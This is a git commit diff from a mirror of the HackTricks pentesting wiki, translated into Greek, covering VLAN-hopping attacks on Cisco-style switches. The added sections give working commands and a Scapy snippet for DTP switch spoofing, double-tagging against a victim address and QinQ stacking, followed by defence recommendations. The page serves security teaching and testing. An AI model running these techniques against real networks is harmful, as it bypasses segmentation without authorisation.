mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/generic-methodologies-and-resources/pentesting-network/
This commit is contained in:
Translator
parent
714fa4a046
commit
a5f2ed3718
@ -2,11 +2,11 @@
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
Εάν είναι διαθέσιμη άμεση πρόσβαση σε έναν διακόπτη, η κατανομή VLAN μπορεί να παρακαμφθεί. Αυτό περιλαμβάνει την επαναδιαμόρφωση της συνδεδεμένης θύρας σε λειτουργία trunk, τη δημιουργία εικονικών διεπαφών για τις στοχευμένες VLAN και την ρύθμιση διευθύνσεων IP, είτε δυναμικά (DHCP) είτε στατικά, ανάλογα με το σενάριο (**για περισσότερες λεπτομέρειες δείτε [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).**
|
||||
Εάν είναι διαθέσιμη άμεση πρόσβαση σε έναν διακόπτη, η τμηματοποίηση VLAN μπορεί να παρακαμφθεί. Αυτό περιλαμβάνει την επαναδιαμόρφωση της συνδεδεμένης θύρας σε λειτουργία trunk, τη δημιουργία εικονικών διεπαφών για τις στοχευμένες VLAN και την ρύθμιση διευθύνσεων IP, είτε δυναμικά (DHCP) είτε στατικά, ανάλογα με το σενάριο (**για περισσότερες λεπτομέρειες δείτε [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).**
|
||||
|
||||
Αρχικά, απαιτείται η αναγνώριση της συγκεκριμένης συνδεδεμένης θύρας. Αυτό μπορεί συνήθως να επιτευχθεί μέσω μηνυμάτων CDP ή αναζητώντας τη θύρα μέσω της μάσκας **include**.
|
||||
|
||||
**Εάν το CDP δεν λειτουργεί, η αναγνώριση της θύρας μπορεί να επιχειρηθεί αναζητώντας τη διεύθυνση MAC**:
|
||||
**Εάν το CDP δεν λειτουργεί, μπορεί να γίνει προσπάθεια αναγνώρισης της θύρας αναζητώντας τη διεύθυνση MAC**:
|
||||
```
|
||||
SW1(config)# show mac address-table | include 0050.0000.0500
|
||||
```
|
||||
@ -44,12 +44,80 @@ sudo dhclient -v eth0.60
|
||||
```bash
|
||||
sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
|
||||
```
|
||||
Η συνδεσιμότητα ελέγχεται με την εκκίνηση ICMP αιτημάτων προς τις προεπιλεγμένες πύλες για τα VLAN 10, 20, 50 και 60.
|
||||
Η συνδεσιμότητα ελέγχεται με την εκκίνηση αιτημάτων ICMP προς τις προεπιλεγμένες πύλες για τα VLAN 10, 20, 50 και 60.
|
||||
|
||||
Τελικά, αυτή η διαδικασία επιτρέπει την παράκαμψη της κατανομής VLAN, διευκολύνοντας έτσι την απεριόριστη πρόσβαση σε οποιοδήποτε δίκτυο VLAN και προετοιμάζοντας το έδαφος για επόμενες ενέργειες.
|
||||
|
||||
---
|
||||
|
||||
## Άλλες Τεχνικές VLAN-Hopping (χωρίς προνομιακή CLI διακόπτη)
|
||||
|
||||
Η προηγούμενη μέθοδος υποθέτει ότι υπάρχει αυθεντικοποιημένη πρόσβαση κονσόλας ή Telnet/SSH στον διακόπτη. Σε πραγματικές καταστάσεις, ο επιτιθέμενος είναι συνήθως συνδεδεμένος σε μια **κανονική θύρα πρόσβασης**. Οι παρακάτω τεχνικές Layer-2 συχνά σας επιτρέπουν να μετακινηθείτε οριζόντια χωρίς να συνδεθείτε ποτέ στο λειτουργικό σύστημα του διακόπτη:
|
||||
|
||||
### 1. Switch-Spoofing με Πρωτόκολλο Δυναμικής Σύνδεσης (DTP)
|
||||
|
||||
Οι διακόπτες Cisco που διατηρούν ενεργοποιημένο το DTP θα διαπραγματευτούν ευχαρίστως μια σύνδεση trunk αν ο ομότιμος ισχυριστεί ότι είναι διακόπτης. Η δημιουργία ενός μόνο πλαισίου **DTP “desirable”** ή **“trunk”** μετατρέπει τη θύρα πρόσβασης σε trunk 802.1Q που μεταφέρει *όλα* τα επιτρεπόμενα VLANs.
|
||||
|
||||
*Yersinia* και αρκετές PoCs αυτοματοποιούν τη διαδικασία:
|
||||
```bash
|
||||
# Become a trunk using Yersinia (GUI)
|
||||
$ sudo yersinia -G # Launch GUI → Launch attack → DTP → enabling trunking
|
||||
|
||||
# Python PoC (dtp-spoof)
|
||||
$ git clone https://github.com/fleetcaptain/dtp-spoof.git
|
||||
$ sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable
|
||||
```
|
||||
Μόλις η θύρα αλλάξει σε trunk, μπορείτε να δημιουργήσετε υποδιευθύνσεις 802.1Q και να κάνετε pivot ακριβώς όπως φαίνεται στην προηγούμενη ενότητα. Οι σύγχρονοι πυρήνες Linux δεν απαιτούν πια *vconfig*; αντί αυτού χρησιμοποιήστε *ip link*:
|
||||
```bash
|
||||
sudo modprobe 8021q
|
||||
sudo ip link add link eth0 name eth0.30 type vlan id 30
|
||||
sudo ip addr add 10.10.30.66/24 dev eth0.30
|
||||
sudo ip link set eth0.30 up
|
||||
```
|
||||
### 2. Διπλή Ετικέτα (Κατάχρηση Native-VLAN)
|
||||
|
||||
Εάν ο επιτιθέμενος βρίσκεται στο **native (χωρίς ετικέτα) VLAN**, ένα κατασκευασμένο πλαίσιο με *δύο* 802.1Q κεφαλίδες μπορεί να "πηδήξει" σε ένα δεύτερο VLAN ακόμη και όταν η θύρα είναι κλειδωμένη σε λειτουργία πρόσβασης. Εργαλεία όπως το **VLANPWN DoubleTagging.py** (ανανεωμένο 2022-2024) αυτοματοποιούν την ένεση:
|
||||
```bash
|
||||
python3 DoubleTagging.py \
|
||||
--interface eth0 \
|
||||
--nativevlan 1 \
|
||||
--targetvlan 20 \
|
||||
--victim 10.10.20.24 \
|
||||
--attacker 10.10.1.54
|
||||
```
|
||||
Packet walk-through:
|
||||
1. Η εξωτερική ετικέτα (1) αφαιρείται από τον πρώτο διακόπτη επειδή ταιριάζει με το εγγενές VLAN.
|
||||
2. Η εσωτερική ετικέτα (20) είναι τώρα εκτεθειμένη; το πλαίσιο προωθείται προς το trunk προς το VLAN 20.
|
||||
|
||||
Η τεχνική εξακολουθεί να λειτουργεί το 2025 σε δίκτυα που αφήνουν το εγγενές VLAN στην προεπιλογή και δέχονται μη ετικετοποιημένα πλαίσια.
|
||||
|
||||
### 3. QinQ (802.1ad) Stacking
|
||||
|
||||
Πολλοί πυρήνες επιχειρήσεων υποστηρίζουν *Q-in-Q* υπηρεσία παρόχου encapsulation. Όπου επιτρέπεται, ένας επιτιθέμενος μπορεί να σήμανε τυχαία 802.1Q-ετικετοποιημένη κίνηση μέσα σε έναν πάροχο (S-tag) για να διασχίσει τις ζώνες ασφαλείας. Συλλέξτε για 802.1ad ethertype 0x88a8 και προσπαθήστε να αφαιρέσετε την εξωτερική ετικέτα με το Scapy:
|
||||
```python
|
||||
from scapy.all import *
|
||||
outer = 100 # Service tag
|
||||
inner = 30 # Customer / target VLAN
|
||||
payload = Ether(dst="ff:ff:ff:ff:ff:ff")/Dot1Q(vlan=inner)/IP(dst="10.10.30.1")/ICMP()
|
||||
frame = Dot1Q(type=0x88a8, vlan=outer)/payload
|
||||
sendp(frame, iface="eth0")
|
||||
```
|
||||
---
|
||||
|
||||
## Συστάσεις Άμυνας
|
||||
|
||||
1. Απενεργοποιήστε το DTP σε όλες τις θύρες που απευθύνονται στους χρήστες: `switchport mode access` + `switchport nonegotiate`.
|
||||
2. Αλλάξτε το εγγενές VLAN σε κάθε trunk σε ένα **μη χρησιμοποιούμενο, μαύρο VLAN** και προσθέστε ετικέτα: `vlan dot1q tag native`.
|
||||
3. Αφαιρέστε τα περιττά VLAN σε trunks: `switchport trunk allowed vlan 10,20`.
|
||||
4. Επιβάλετε ασφάλεια θύρας, DHCP snooping & δυναμική επιθεώρηση ARP για να περιορίσετε τη δραστηριότητα Layer-2 που είναι κακόβουλη.
|
||||
5. Προτιμήστε τα private-VLANs ή τη L3 διαχωριστική γραμμή αντί να βασίζεστε αποκλειστικά στη διαχωριστική γραμμή 802.1Q.
|
||||
|
||||
---
|
||||
|
||||
## Αναφορές
|
||||
|
||||
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
|
||||
- VLANPWN attack toolkit – <https://github.com/casterbytethrowback/VLANPWN>
|
||||
- Twingate "Τι είναι το VLAN Hopping;" (Αυγ 2024) – <https://www.twingate.com/blog/glossary/vlan%20hopping>
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user